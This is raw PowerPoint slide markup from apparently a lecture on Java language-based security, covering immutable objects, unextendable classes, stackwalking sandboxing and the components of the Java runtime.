                <a:tab pos="10299919" algn="l"/>
                <a:tab pos="10842388" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unextendable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> classes   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="372730" indent="-372730" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="372730" algn="l"/>
                <a:tab pos="535470" algn="l"/>
                <a:tab pos="1077939" algn="l"/>
                <a:tab pos="1620409" algn="l"/>
                <a:tab pos="2162878" algn="l"/>
                <a:tab pos="2705347" algn="l"/>
                <a:tab pos="3247817" algn="l"/>
                <a:tab pos="3790286" algn="l"/>
                <a:tab pos="4332755" algn="l"/>
                <a:tab pos="4875225" algn="l"/>
                <a:tab pos="5417694" algn="l"/>
                <a:tab pos="5960164" algn="l"/>
                <a:tab pos="6502633" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7587572" algn="l"/>
                <a:tab pos="8130041" algn="l"/>
                <a:tab pos="8672511" algn="l"/>
                <a:tab pos="9214980" algn="l"/>
                <a:tab pos="9757449" algn="l"/>
                <a:tab pos="10299919" algn="l"/>
                <a:tab pos="10842388" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>immutable objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL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String, Boolean, Integer, URL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="372730" indent="-372730" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="372730" algn="l"/>
                <a:tab pos="535470" algn="l"/>
                <a:tab pos="1077939" algn="l"/>
                <a:tab pos="1620409" algn="l"/>
                <a:tab pos="2162878" algn="l"/>
                <a:tab pos="2705347" algn="l"/>
                <a:tab pos="3247817" algn="l"/>
                <a:tab pos="3790286" algn="l"/>
                <a:tab pos="4332755" algn="l"/>
                <a:tab pos="4875225" algn="l"/>
                <a:tab pos="5417694" algn="l"/>
                <a:tab pos="5960164" algn="l"/>
                <a:tab pos="6502633" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7587572" algn="l"/>
                <a:tab pos="8130041" algn="l"/>
                <a:tab pos="8672511" algn="l"/>
                <a:tab pos="9214980" algn="l"/>
                <a:tab pos="9757449" algn="l"/>
                <a:tab pos="10299919" algn="l"/>
                <a:tab pos="10842388" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sandboxing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>based on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stackwalking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="372730" indent="-372730" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="372730" algn="l"/>
                <a:tab pos="535470" algn="l"/>
                <a:tab pos="1077939" algn="l"/>
                <a:tab pos="1620409" algn="l"/>
                <a:tab pos="2162878" algn="l"/>
                <a:tab pos="2705347" algn="l"/>
                <a:tab pos="3247817" algn="l"/>
                <a:tab pos="3790286" algn="l"/>
                <a:tab pos="4332755" algn="l"/>
                <a:tab pos="4875225" algn="l"/>
                <a:tab pos="5417694" algn="l"/>
                <a:tab pos="5960164" algn="l"/>
                <a:tab pos="6502633" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7587572" algn="l"/>
                <a:tab pos="8130041" algn="l"/>
                <a:tab pos="8672511" algn="l"/>
                <a:tab pos="9214980" algn="l"/>
                <a:tab pos="9757449" algn="l"/>
                <a:tab pos="10299919" algn="l"/>
                <a:tab pos="10842388" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="372730" algn="l"/>
                <a:tab pos="535470" algn="l"/>
                <a:tab pos="1077939" algn="l"/>
                <a:tab pos="1620409" algn="l"/>
                <a:tab pos="2162878" algn="l"/>
                <a:tab pos="2705347" algn="l"/>
                <a:tab pos="3247817" algn="l"/>
                <a:tab pos="3790286" algn="l"/>
                <a:tab pos="4332755" algn="l"/>
                <a:tab pos="4875225" algn="l"/>
                <a:tab pos="5417694" algn="l"/>
                <a:tab pos="5960164" algn="l"/>
                <a:tab pos="6502633" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7587572" algn="l"/>
                <a:tab pos="8130041" algn="l"/>
                <a:tab pos="8672511" algn="l"/>
                <a:tab pos="9214980" algn="l"/>
                <a:tab pos="9757449" algn="l"/>
                <a:tab pos="10299919" algn="l"/>
                <a:tab pos="10842388" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allows security guarantees </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0"/>
              <a:t>to be made </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>even if part of the code is untrusted – or simply buggy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="2205" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="372730" algn="l"/>
                <a:tab pos="535470" algn="l"/>
                <a:tab pos="1077939" algn="l"/>
                <a:tab pos="1620409" algn="l"/>
                <a:tab pos="2162878" algn="l"/>
                <a:tab pos="2705347" algn="l"/>
                <a:tab pos="3247817" algn="l"/>
                <a:tab pos="3790286" algn="l"/>
                <a:tab pos="4332755" algn="l"/>
                <a:tab pos="4875225" algn="l"/>
                <a:tab pos="5417694" algn="l"/>
                <a:tab pos="5960164" algn="l"/>
                <a:tab pos="6502633" algn="l"/>
                <a:tab pos="7045102" algn="l"/>
                <a:tab pos="7587572" algn="l"/>
                <a:tab pos="8130041" algn="l"/>
                <a:tab pos="8672511" algn="l"/>
                <a:tab pos="9214980" algn="l"/>
                <a:tab pos="9757449" algn="l"/>
                <a:tab pos="10299919" algn="l"/>
                <a:tab pos="10842388" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0"/>
              <a:t>Similar guarantees for Microsoft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.NET/C#, Scala, …</a:t>
            </a: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F22942ED-766E-0342-652D-EB3B72827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539750" algn="l"/>
                <a:tab pos="1082675" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="2166938" algn="l"/>
                <a:tab pos="2709863" algn="l"/>
                <a:tab pos="3252788" algn="l"/>
                <a:tab pos="3794125" algn="l"/>
                <a:tab pos="4337050" algn="l"/>
                <a:tab pos="4879975" algn="l"/>
                <a:tab pos="5422900" algn="l"/>
                <a:tab pos="5964238" algn="l"/>
                <a:tab pos="6507163" algn="l"/>
                <a:tab pos="7050088" algn="l"/>
                <a:tab pos="7591425" algn="l"/>
                <a:tab pos="8134350" algn="l"/>
                <a:tab pos="8677275" algn="l"/>
                <a:tab pos="9220200" algn="l"/>
                <a:tab pos="9761538" algn="l"/>
                <a:tab pos="10304463" algn="l"/>
                <a:tab pos="10847388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539750" algn="l"/>
                <a:tab pos="1082675" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="2166938" algn="l"/>
                <a:tab pos="2709863" algn="l"/>
                <a:tab pos="3252788" algn="l"/>
                <a:tab pos="3794125" algn="l"/>
                <a:tab pos="4337050" algn="l"/>
                <a:tab pos="4879975" algn="l"/>
                <a:tab pos="5422900" algn="l"/>
                <a:tab pos="5964238" algn="l"/>
                <a:tab pos="6507163" algn="l"/>
                <a:tab pos="7050088" algn="l"/>
                <a:tab pos="7591425" algn="l"/>
                <a:tab pos="8134350" algn="l"/>
                <a:tab pos="8677275" algn="l"/>
                <a:tab pos="9220200" algn="l"/>
                <a:tab pos="9761538" algn="l"/>
                <a:tab pos="10304463" algn="l"/>
                <a:tab pos="10847388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539750" algn="l"/>
                <a:tab pos="1082675" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="2166938" algn="l"/>
                <a:tab pos="2709863" algn="l"/>
                <a:tab pos="3252788" algn="l"/>
                <a:tab pos="3794125" algn="l"/>
                <a:tab pos="4337050" algn="l"/>
                <a:tab pos="4879975" algn="l"/>
                <a:tab pos="5422900" algn="l"/>
                <a:tab pos="5964238" algn="l"/>
                <a:tab pos="6507163" algn="l"/>
                <a:tab pos="7050088" algn="l"/>
                <a:tab pos="7591425" algn="l"/>
                <a:tab pos="8134350" algn="l"/>
                <a:tab pos="8677275" algn="l"/>
                <a:tab pos="9220200" algn="l"/>
                <a:tab pos="9761538" algn="l"/>
                <a:tab pos="10304463" algn="l"/>
                <a:tab pos="10847388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539750" algn="l"/>
                <a:tab pos="1082675" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="2166938" algn="l"/>
                <a:tab pos="2709863" algn="l"/>
                <a:tab pos="3252788" algn="l"/>
                <a:tab pos="3794125" algn="l"/>
                <a:tab pos="4337050" algn="l"/>
                <a:tab pos="4879975" algn="l"/>
                <a:tab pos="5422900" algn="l"/>
                <a:tab pos="5964238" algn="l"/>
                <a:tab pos="6507163" algn="l"/>
                <a:tab pos="7050088" algn="l"/>
                <a:tab pos="7591425" algn="l"/>
                <a:tab pos="8134350" algn="l"/>
                <a:tab pos="8677275" algn="l"/>
                <a:tab pos="9220200" algn="l"/>
                <a:tab pos="9761538" algn="l"/>
                <a:tab pos="10304463" algn="l"/>
                <a:tab pos="10847388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539750" algn="l"/>
                <a:tab pos="1082675" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="2166938" algn="l"/>
                <a:tab pos="2709863" algn="l"/>
                <a:tab pos="3252788" algn="l"/>
                <a:tab pos="3794125" algn="l"/>
                <a:tab pos="4337050" algn="l"/>
                <a:tab pos="4879975" algn="l"/>
                <a:tab pos="5422900" algn="l"/>
                <a:tab pos="5964238" algn="l"/>
                <a:tab pos="6507163" algn="l"/>
                <a:tab pos="7050088" algn="l"/>
                <a:tab pos="7591425" algn="l"/>
                <a:tab pos="8134350" algn="l"/>
                <a:tab pos="8677275" algn="l"/>
                <a:tab pos="9220200" algn="l"/>
                <a:tab pos="9761538" algn="l"/>
                <a:tab pos="10304463" algn="l"/>
                <a:tab pos="10847388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539750" algn="l"/>
                <a:tab pos="1082675" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="2166938" algn="l"/>
                <a:tab pos="2709863" algn="l"/>
                <a:tab pos="3252788" algn="l"/>
                <a:tab pos="3794125" algn="l"/>
                <a:tab pos="4337050" algn="l"/>
                <a:tab pos="4879975" algn="l"/>
                <a:tab pos="5422900" algn="l"/>
                <a:tab pos="5964238" algn="l"/>
                <a:tab pos="6507163" algn="l"/>
                <a:tab pos="7050088" algn="l"/>
                <a:tab pos="7591425" algn="l"/>
                <a:tab pos="8134350" algn="l"/>
                <a:tab pos="8677275" algn="l"/>
                <a:tab pos="9220200" algn="l"/>
                <a:tab pos="9761538" algn="l"/>
                <a:tab pos="10304463" algn="l"/>
                <a:tab pos="10847388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539750" algn="l"/>
                <a:tab pos="1082675" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="2166938" algn="l"/>
                <a:tab pos="2709863" algn="l"/>
                <a:tab pos="3252788" algn="l"/>
                <a:tab pos="3794125" algn="l"/>
                <a:tab pos="4337050" algn="l"/>
                <a:tab pos="4879975" algn="l"/>
                <a:tab pos="5422900" algn="l"/>
                <a:tab pos="5964238" algn="l"/>
                <a:tab pos="6507163" algn="l"/>
                <a:tab pos="7050088" algn="l"/>
                <a:tab pos="7591425" algn="l"/>
                <a:tab pos="8134350" algn="l"/>
                <a:tab pos="8677275" algn="l"/>
                <a:tab pos="9220200" algn="l"/>
                <a:tab pos="9761538" algn="l"/>
                <a:tab pos="10304463" algn="l"/>
                <a:tab pos="10847388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539750" algn="l"/>
                <a:tab pos="1082675" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="2166938" algn="l"/>
                <a:tab pos="2709863" algn="l"/>
                <a:tab pos="3252788" algn="l"/>
                <a:tab pos="3794125" algn="l"/>
                <a:tab pos="4337050" algn="l"/>
                <a:tab pos="4879975" algn="l"/>
                <a:tab pos="5422900" algn="l"/>
                <a:tab pos="5964238" algn="l"/>
                <a:tab pos="6507163" algn="l"/>
                <a:tab pos="7050088" algn="l"/>
                <a:tab pos="7591425" algn="l"/>
                <a:tab pos="8134350" algn="l"/>
                <a:tab pos="8677275" algn="l"/>
                <a:tab pos="9220200" algn="l"/>
                <a:tab pos="9761538" algn="l"/>
                <a:tab pos="10304463" algn="l"/>
                <a:tab pos="10847388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539750" algn="l"/>
                <a:tab pos="1082675" algn="l"/>
                <a:tab pos="1625600" algn="l"/>
                <a:tab pos="2166938" algn="l"/>
                <a:tab pos="2709863" algn="l"/>
                <a:tab pos="3252788" algn="l"/>
                <a:tab pos="3794125" algn="l"/>
                <a:tab pos="4337050" algn="l"/>
                <a:tab pos="4879975" algn="l"/>
                <a:tab pos="5422900" algn="l"/>
                <a:tab pos="5964238" algn="l"/>
                <a:tab pos="6507163" algn="l"/>
                <a:tab pos="7050088" algn="l"/>
                <a:tab pos="7591425" algn="l"/>
                <a:tab pos="8134350" algn="l"/>
                <a:tab pos="8677275" algn="l"/>
                <a:tab pos="9220200" algn="l"/>
                <a:tab pos="9761538" algn="l"/>
                <a:tab pos="10304463" algn="l"/>
                <a:tab pos="10847388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8EC308D4-F101-45DC-B4C8-BB326BB73AF7}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1500" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1500"/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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DE8A17C-EC4B-125F-3D19-9BF1A9A2F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Components of the Java Runtime  </a:t>
            </a:r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61D53627-42BD-9853-BADE-210F401AB2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  <a:tab pos="21701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3C463905-33EE-45BF-8724-E77D4AD6E9C7}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1400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F822A137-81BE-D9FB-9BD6-3572A8341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563938"/>
            <a:ext cx="2592387" cy="1522412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="99196" tIns="51583" rIns="99196" bIns="51583">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:tabLst>
                <a:tab pos="0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0113" algn="l"/>
                <a:tab pos="3933825" algn="l"/>
                <a:tab pos="4425950" algn="l"/>
                <a:tab pos="4918075" algn="l"/>
                <a:tab pos="5408613" algn="l"/>
                <a:tab pos="5902325" algn="l"/>
                <a:tab pos="6394450" algn="l"/>
                <a:tab pos="6884988" algn="l"/>
                <a:tab pos="7377113" algn="l"/>
                <a:tab pos="7870825" algn="l"/>
                <a:tab pos="8362950" algn="l"/>
                <a:tab pos="8853488" algn="l"/>
                <a:tab pos="9345613" algn="l"/>
                <a:tab pos="98393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0113" algn="l"/>
                <a:tab pos="3933825" algn="l"/>
                <a:tab pos="4425950" algn="l"/>
                <a:tab pos="4918075" algn="l"/>
                <a:tab pos="5408613" algn="l"/>
                <a:tab pos="5902325" algn="l"/>
                <a:tab pos="6394450" algn="l"/>
                <a:tab pos="6884988" algn="l"/>
                <a:tab pos="7377113" algn="l"/>
                <a:tab pos="7870825" algn="l"/>
                <a:tab pos="8362950" algn="l"/>
                <a:tab pos="8853488" algn="l"/>
                <a:tab pos="9345613" algn="l"/>
                <a:tab pos="98393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0113" algn="l"/>
                <a:tab pos="3933825" algn="l"/>
                <a:tab pos="4425950" algn="l"/>
                <a:tab pos="4918075" algn="l"/>
                <a:tab pos="5408613" algn="l"/>
                <a:tab pos="5902325" algn="l"/>
                <a:tab pos="6394450" algn="l"/>
                <a:tab pos="6884988" algn="l"/>
                <a:tab pos="7377113" algn="l"/>
                <a:tab pos="7870825" algn="l"/>
                <a:tab pos="8362950" algn="l"/>
                <a:tab pos="8853488" algn="l"/>
                <a:tab pos="9345613" algn="l"/>
                <a:tab pos="98393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0113" algn="l"/>
                <a:tab pos="3933825" algn="l"/>
                <a:tab pos="4425950" algn="l"/>
                <a:tab pos="4918075" algn="l"/>
                <a:tab pos="5408613" algn="l"/>
                <a:tab pos="5902325" algn="l"/>
                <a:tab pos="6394450" algn="l"/>
                <a:tab pos="6884988" algn="l"/>
                <a:tab pos="7377113" algn="l"/>
                <a:tab pos="7870825" algn="l"/>
                <a:tab pos="8362950" algn="l"/>
                <a:tab pos="8853488" algn="l"/>
                <a:tab pos="9345613" algn="l"/>
                <a:tab pos="98393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0113" algn="l"/>
                <a:tab pos="3933825" algn="l"/>
                <a:tab pos="4425950" algn="l"/>
                <a:tab pos="4918075" algn="l"/>
                <a:tab pos="5408613" algn="l"/>
                <a:tab pos="5902325" algn="l"/>
                <a:tab pos="6394450" algn="l"/>
                <a:tab pos="6884988" algn="l"/>
                <a:tab pos="7377113" algn="l"/>
                <a:tab pos="7870825" algn="l"/>
                <a:tab pos="8362950" algn="l"/>
                <a:tab pos="8853488" algn="l"/>
                <a:tab pos="9345613" algn="l"/>
                <a:tab pos="98393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0113" algn="l"/>
                <a:tab pos="3933825" algn="l"/>
                <a:tab pos="4425950" algn="l"/>
                <a:tab pos="4918075" algn="l"/>
                <a:tab pos="5408613" algn="l"/>
                <a:tab pos="5902325" algn="l"/>
                <a:tab pos="6394450" algn="l"/>
                <a:tab pos="6884988" algn="l"/>
                <a:tab pos="7377113" algn="l"/>
                <a:tab pos="7870825" algn="l"/>
                <a:tab pos="8362950" algn="l"/>
                <a:tab pos="8853488" algn="l"/>
                <a:tab pos="9345613" algn="l"/>
                <a:tab pos="98393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0113" algn="l"/>
                <a:tab pos="3933825" algn="l"/>
                <a:tab pos="4425950" algn="l"/>
                <a:tab pos="4918075" algn="l"/>
                <a:tab pos="5408613" algn="l"/>
                <a:tab pos="5902325" algn="l"/>
                <a:tab pos="6394450" algn="l"/>
                <a:tab pos="6884988" algn="l"/>
                <a:tab pos="7377113" algn="l"/>
                <a:tab pos="7870825" algn="l"/>
                <a:tab pos="8362950" algn="l"/>
                <a:tab pos="8853488" algn="l"/>
                <a:tab pos="9345613" algn="l"/>
                <a:tab pos="98393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0113" algn="l"/>
                <a:tab pos="3933825" algn="l"/>
                <a:tab pos="4425950" algn="l"/>
                <a:tab pos="4918075" algn="l"/>
                <a:tab pos="5408613" algn="l"/>
                <a:tab pos="5902325" algn="l"/>
                <a:tab pos="6394450" algn="l"/>
                <a:tab pos="6884988" algn="l"/>
                <a:tab pos="7377113" algn="l"/>
                <a:tab pos="7870825" algn="l"/>
                <a:tab pos="8362950" algn="l"/>
                <a:tab pos="8853488" algn="l"/>
                <a:tab pos="9345613" algn="l"/>
                <a:tab pos="98393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0113" algn="l"/>
                <a:tab pos="3933825" algn="l"/>
                <a:tab pos="4425950" algn="l"/>
                <a:tab pos="4918075" algn="l"/>
                <a:tab pos="5408613" algn="l"/>
                <a:tab pos="5902325" algn="l"/>
                <a:tab pos="6394450" algn="l"/>
                <a:tab pos="6884988" algn="l"/>
                <a:tab pos="7377113" algn="l"/>
                <a:tab pos="7870825" algn="l"/>
                <a:tab pos="8362950" algn="l"/>
                <a:tab pos="8853488" algn="l"/>
                <a:tab pos="9345613" algn="l"/>
                <a:tab pos="98393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altLang="en-US" sz="1984">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Java Runtime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altLang="en-US" sz="1984">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Environment (JRE)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1984">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>incl. Virtual Machine (VM)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1984">
              <a:solidFill>
                <a:srgbClr val="3333CC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83973" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14AA2CFE-5CD9-B04A-1800-AA625735BB48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2232025" y="1995488"/>
            <a:ext cx="5732463" cy="4264025"/>
            <a:chOff x="2284388" y="2390775"/>
            <a:chExt cx="5732487" cy="4265613"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="83974" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{472B2F38-47DA-6238-6559-E2033E014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388" y="4771256"/>
              <a:ext cx="5536505" cy="1191992"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="3333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9196" tIns="51583" rIns="99196" bIns="51583" anchor="ctr"/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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
                  <a:tab pos="5422900" algn="l"/>
                  <a:tab pos="5964238" algn="l"/>
                  <a:tab pos="6507163" algn="l"/>
                  <a:tab pos="7050088" algn="l"/>
                  <a:tab pos="7591425" algn="l"/>
                  <a:tab pos="8134350" algn="l"/>
                  <a:tab pos="8677275" algn="l"/>
                  <a:tab pos="9220200" algn="l"/>
                  <a:tab pos="9761538" algn="l"/>
                  <a:tab pos="10304463" algn="l"/>
                  <a:tab pos="10847388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539750" algn="l"/>
                  <a:tab pos="1082675" algn="l"/>
                  <a:tab pos="1625600" algn="l"/>
                  <a:tab pos="2166938" algn="l"/>
                  <a:tab pos="2709863" algn="l"/>
                  <a:tab pos="3252788" algn="l"/>
                  <a:tab pos="3794125" algn="l"/>
                  <a:tab pos="4337050" algn="l"/>
                  <a:tab pos="4879975" algn="l"/>
